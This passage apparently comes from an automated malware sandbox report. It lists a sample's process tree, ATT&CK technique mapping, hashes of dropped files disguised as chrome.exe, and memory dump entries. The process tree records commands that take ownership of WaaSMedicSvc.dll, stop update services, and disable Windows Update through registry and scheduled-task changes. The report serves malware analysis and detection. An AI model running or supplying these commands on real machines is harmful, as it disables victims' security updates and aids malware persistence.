- Modifies registry key
PID:3556

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1548

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2656

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
PID:216

C:\Windows\system32\sc.exe
sc stop bits
3⤵
PID:3392

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:4456

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1612

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2956

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:5112

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:3324

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:4784

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:5036

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:724

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:1616

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:2868

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:5040

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
PID:5020

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "svxkttprhkijqhd"
3⤵
PID:2184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2296 -ip 2296
1⤵
PID:3056

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

2

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Impair Defenses

1

T1562

File Permissions Modification

1

T1222

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\GoogleUpdater\chrome.exe
Filesize
208.7MB

MD5
c68f2ab674690277f57a5b7d37a07be3

SHA1
6cba9aef3e1471281dd3cc2124bfbb8bb5eff495

SHA256
06647e41c013e10d4505444315bcbcb36c440b2e2cf79d530d487f5a8f1d1163

SHA512
6e0203d25312eb025c6dc43e9ed3099196364efbdc58598832b5198bec206272982da819ddc15efdb47bbd27dcc30c6196cd5484f185eff906ed7d73e2c34eb3

Download Submit
C:\Program Files\Google\GoogleUpdater\chrome.exe
Filesize
206.1MB

MD5
cdc4b663f28013a94296040b5a35ae82

SHA1
c453f04ca1e07cffb607539c447a827d5e4e60d5

SHA256
8930d6fbaf8539b4ae1e051b8bba5ffb790faa9d391ef68610515d5ea15da3d7

SHA512
47cb356789b1ae1f6f0385de5ca71e0b49bff61419c01405e6f254fd4b265746999b03cb8f1da5b72d66a0a059996e78ef77097904852be3a3d57a5731ff874d

Download Submit
C:\Users\Admin\AppData\Local\Temp\chrome.exe
Filesize
329.2MB

MD5
156d9e9ae578526fa7f9da7bc7952ed9

SHA1
b57597a1653a2ee0b87423d8ee2fd0a2e65632a9

SHA256
8e463b6188cf7c92df5eedd29060619f240fb8be3d01e18c7a71eb63fae6b37c

SHA512
917069dcae03d5f45e9bdf1ddf7711562cf3156e6bdbf3e4a59085db1b277814c71df946716464b66c4d4dd2574cee47dd3cb174caa6c622f0a7dbb7f02993dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\chrome.exe
Filesize
359.7MB

MD5
a454029f76dab8cfdbabbffee854d6e4

SHA1
f37cefd819a89562343389b1ec3ba762ede0550f

SHA256
a4d29d2404a84674a80764cc66f2b8903a58b6347a155c775132b05b0ca9a019

SHA512
60cdda246fc4e5734f7aa15907f0bd7ecbec26c29831f08de07b3a1ae1bf19377635bf6f547215ea878fa3ee146d279f85b5ef30ccfbb8bfa1922f9224a49000

Download Submit
C:\Users\Admin\AppData\Local\Temp\randomNAM.exe
Filesize
379.8MB

MD5
e284c1fb763c86f47f7d85c35916ec47

SHA1
c6b5fd1134c7187185d65253e3bd8a01e233af91

SHA256
f122b48f758780c44468787207b04ab876ac00affd85b43c1a0d67e8af5211fb

SHA512
2637698b81cc062b03dd790034eefdc0276f9a45ffe23f3e53b9210cda3018e736c352ebe65e465fa1b7030bfda4556b1b1a52e30230ef6ddd886dbb78ef3178

Download Submit
C:\Users\Admin\AppData\Local\Temp\randomNAM.exe
Filesize
378.9MB

MD5
592bbb66d29ae6e55817acb7e923010a

SHA1
289c4002547268e55adfdcc8f1fe4977c0332da8

SHA256
030e0f4e23ac057578248646d480599656a261114799651812f567167b74f097

SHA512
569e367378c0d42e2eb2c5eaa50d70cf72e99af270e01c37e2f012518c4c9c03a251837ffe4c518ada5b9f9f49a163b92e72a2c79968d2e6e8e90707b83e5242

Download Submit
memory/216-202-0x0000000000000000-mapping.dmp

Download
memory/308-198-0x0000000000000000-mapping.dmp

Download
memory/364-172-0x0000000000000000-mapping.dmp

Download
memory/428-170-0x0000000000000000-mapping.dmp

Download
memory/724-221-0x0000000000000000-mapping.dmp

Download
memory/968-181-0x0000000000000000-mapping.dmp

Download
memory/1112-160-0x0000000000000000-mapping.dmp

Download
memory/1116-158-0x0000000000000000-mapping.dmp

Download
memory/1188-182-0x0000000000000000-mapping.dmp

Download
memory/1536-146-0x0000000001050000-0x0000000001062000-memory.dmp

Filesize
72KB

Download
memory/1536-144-0x00007FFE082D0000-0x00007FFE08D91000-memory.dmp

Filesize
10.8MB

Download
memory/1536-143-0x0000000000520000-0x0000000000716000-memory.dmp

Filesize
2.0MB

Download
memory/1536-140-0x0000000000000000-mapping.dmp

Download
memory/1548-213-0x0000000000000000-mapping.dmp

Download
memory/1612-215-0x0000000000000000-mapping.dmp

Download
memory/1616-157-0x0000000000000000-mapping.dmp

Download
memory/1616-222-0x0000000000000000-mapping.dmp

Download
memory/1740-185-0x00007FFE083F0000-0x00007FFE08EB1000-memory.dmp

Filesize
10.8MB

Download
memory/1832-171-0x0000000000000000-mapping.dmp

Download
memory/1912-207-0x0000000000000000-mapping.dmp

Download
memory/1956-177-0x0000000000000000-mapping.dmp

Download
memory/1968-174-0x0000000000000000-mapping.dmp

Download
memory/1992-178-0x0000000000000000-mapping.dmp

Download
memory/2052-159-0x0000000000000000-mapping.dmp

Download
memory/2184-225-0x00000150055F0000-0x0000015005605000-memory.dmp

Filesize
84KB

Download
memory/2184-226-0x00007FFE083F0000-0x00007FFE08EB1000-memory.dmp

Filesize
10.8MB

Download
memory/2296-152-0x0000000006390000-0x0000000006422000-memory.dmp

Filesize
584KB

Download
memory/2296-145-0x00000000056C0000-0x0000000005726000-memory.dmp

Filesize
408KB

Download
memory/2296-135-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2296-134-0x0000000000000000-mapping.dmp

Download
memory/2296-151-0x0000000006840000-0x0000000006DE4000-memory.dmp

Filesize
5.6MB

Download
memory/2312-164-0x0000000000000000-mapping.dmp

Download
memory/2344-175-0x0000000000000000-mapping.dmp

Download
memory/2508-179-0x0000000000000000-mapping.dmp

Download
memory/2548-206-0x0000000000000000-mapping.dmp

Download
memory/2656-209-0x0000000000000000-mapping.dmp

Download
memory/2868-223-0x0000000000000000-mapping.dmp

Download
memory/2948-173-0x0000000000000000-mapping.dmp

Download
memory/2956-217-0x0000000000000000-mapping.dmp

Download
memory/3092-168-0x0000000000000000-mapping.dmp

Download
memory/3140-197-0x0000000000000000-mapping.dmp

Download
memory/3292-176-0x0000000000000000-mapping.dmp

Download
memory/3304-153-0x0000000000000000-mapping.dmp

Download
memory/3324-218-0x0000000000000000-mapping.dmp

Download
memory/3356-161-0x0000000000000000-mapping.dmp

Download
memory/3392-201-0x0000000000000000-mapping.dmp

Download
memory/3416-163-0x0000000000000000-mapping.dmp

Download
memory/3556-204-0x0000000000000000-mapping.dmp

Download
memory/3636-131-0x0000000000000000-mapping.dmp

Download
memory/3660-203-0x0000000000000000-mapping.dmp

Download
memory/3732-162-0x0000000000000000-mapping.dmp

Download
memory/3924-165-0x0000000000000000-mapping.dmp

Download
memory/4068-180-0x0000000000000000-mapping.dmp

Download
memory/4124-169-0x0000000000000000-mapping.dmp

Download
memory/4176-166-0x0000000000000000-mapping.dmp

Download
memory/4264-186-0x0000000000000000-mapping.dmp

Download
memory/4292-189-0x000002729A340000-0x000002729A35C000-memory.dmp

Filesize
112KB

Download
memory/4292-195-0x000002729A470000-0x000002729A476000-memory.dmp

Filesize
24KB

Download
memory/4292-190-0x000002729A420000-0x000002729A42A000-memory.dmp

Filesize
40KB

Download
memory/4292-192-0x000002729A430000-0x000002729A43A000-memory.dmp

Filesize
40KB

Download
memory/4292-188-0x00007FFE083F0000-0x00007FFE08EB1000-memory.dmp

Filesize
10.8MB

Download
memory/4292-187-0x0000000000000000-mapping.dmp

Download
memory/4292-191-0x000002729A450000-0x000002729A46C000-memory.dmp

Filesize
112KB

Download
memory/4292-193-0x000002729A490000-0x000002729A4AA000-memory.dmp

Filesize
104KB

Download
memory/4292-194-0x000002729A440000-0x000002729A448000-memory.dmp

Filesize
32KB

Download
memory/4292-196-0x000002729A480000-0x000002729A48A000-memory.dmp

Filesize
40KB

Download
memory/4316-147-0x0000000000000000-mapping.dmp

Download
memory/4368-167-0x0000000000000000-mapping.dmp

Download
memory/4424-205-0x0000000000000000-mapping.dmp

Download
memory/4456-214-0x0000000000000000-mapping.dmp

Download
memory/4548-200-0x0000000000000000-mapping.dmp

Download
memory/4548-148-0x0000000000000000-mapping.dmp

Download
memory/4548-149-0x0000025F9E0D0000-0x0000025F9E0F2000-memory.dmp

Filesize
136KB

Download
memory/4548-150-0x00007FFE082D0000-0x00007FFE08D91000-memory.dmp

Filesize
10.8MB

Download
memory/4552-199-0x0000000000000000-mapping.dmp

Download
memory/4696-156-0x0000000000000000-mapping.dmp

Download
memory/4784-219-0x0000000000000000-mapping.dmp

Download
memory/4872-154-0x0000000000000000-mapping.dmp

Download
memory/5020-208-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download
memory/5020-212-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download
memory/5020-210-0x0000000000401BEA-mapping.dmp

Download
memory/5036-220-0x0000000000000000-mapping.dmp

Download
memory/5036-155-0x0000000000000000-mapping.dmp

Download
memory/5040-224-0x0000000000000000-mapping.dmp

Download
memory/5112-216-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads